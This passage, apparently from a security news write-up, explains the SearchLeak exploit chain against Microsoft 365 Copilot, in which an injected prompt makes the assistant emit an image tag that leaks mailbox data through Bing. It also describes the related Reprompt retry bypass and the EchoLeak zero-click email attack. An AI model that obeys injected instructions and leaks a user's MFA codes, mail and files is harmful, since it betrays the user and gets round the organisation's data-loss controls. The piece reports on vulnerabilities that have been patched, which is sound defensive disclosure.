SearchLeak: The One-Click M365 Copilot Bug That Drained Mailboxes Through Bing

Step 2 — HTML injection race condition

Copilot rendered its search results in the browser, and its output was not thoroughly sanitized. The attacker’s injected prompt caused Copilot to generate a response containing an HTML <img> tag whose src attribute pointed to an attacker‑controlled URL. A race condition in the rendering pipeline meant the browser fetched and loaded the image—sending the stolen data encoded in the image request—before Copilot’s security filters could inspect and block the output. In effect, the data leaked in the instant between the AI generating its response and the safety guardrail checking it .

Step 3 — SSRF via Bing’s image search endpoint

The final exfiltration hop used a server‑side request forgery (SSRF) against Microsoft’s own Bing image search endpoint. The img tag’s source was crafted so the browser made a request to bing.com, a trusted internal Microsoft domain. Because the request appeared to originate from Bing’s infrastructure, it passed through enterprise network egress controls and data‑loss prevention (DLP) monitors undetected. The sensitive data was encoded in the URL parameters of that seemingly benign image fetch and routed straight to the attacker’s server .

What data was at risk

Once triggered, Copilot worked with the permissions of the authenticated victim. The researchers demonstrated they could steal :

• MFA codes and passwords buried in email bodies
• Full email subjects and message content
• Calendar event details
• SharePoint and OneDrive file summaries and indexed content

Any data that Copilot Enterprise Search could surface through the user’s Microsoft Graph permissions—which in most organisations is extensive—was potentially exfiltrated.

Scope and severity

The NVD described the root cause as “improper neutralization of special elements used in a command (‘command injection’) in M365 Copilot” . Severity scores varied:

• NVD CVSS 3.1: 6.5 (Medium), with a vector of AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
• Tenable CVSS v2: 7.8 (High)
• Microsoft’s own rating: Critical severity internally

The practical risk was high because every Microsoft 365 Copilot Enterprise user was a potential target, the attack required only a single click on what appeared to be a fully trusted URL, and traditional email and network security tools were blind to it. Microsoft confirmed the vulnerability had been remediated server‑side and reported no evidence of in‑the‑wild exploitation at the time of disclosure .

A growing pattern: SearchLeak, Reprompt, and EchoLeak

SearchLeak is the third major prompt‑injection exploit against Microsoft Copilot discovered in roughly a year. The sequence reveals a structural weakness, not isolated bugs.

Reprompt (CVE‑2026‑24307) — January 2026

The same Varonis Threat Labs team disclosed Reprompt, an attack on Copilot Personal (the consumer edition). It also used the q URL parameter to inject instructions, but layered on a “double‑request” technique: Copilot’s leak protections only applied to the first interaction, so a retry could extract profile attributes, file summaries, and conversational memory. Microsoft fixed Reprompt in the January 2026 Patch Tuesday .

EchoLeak (CVE‑2025‑32711) — June 2025

Discovered by Aim Security, EchoLeak was a zero‑click exploit in M365 Copilot. A single email containing hidden markdown image tags could exfiltrate data when Copilot processed the message—no user click needed at all. The attack demonstrated that even passive AI processing of trusted content could be weaponized .

SearchLeak (CVE‑2026‑42824) — June 2026

The Enterprise variant that combined P2P injection with web‑layer bugs to create a one‑click chain that exploited Bing’s own infrastructure as the exfiltration conduit, bypassing DLP entirely .

The common thread: All three attacks exploit the same fundamental architecture. LLM‑based assistants like Copilot trust user‑supplied content—URL parameters, email bodies, search queries—as legitimate instructions. When they produce output, that output often triggers automatic client‑side behaviour in browsers or mail clients (image loads, link renders, automatic fetches), creating a reliable side‑channel for data to leave the organisation. Microsoft has patched each vulnerability individually, but the recurring pattern suggests that prompt injection plus output side‑channels will keep surfacing until the architecture itself addresses where assistants draw the line between instruction and untrusted data .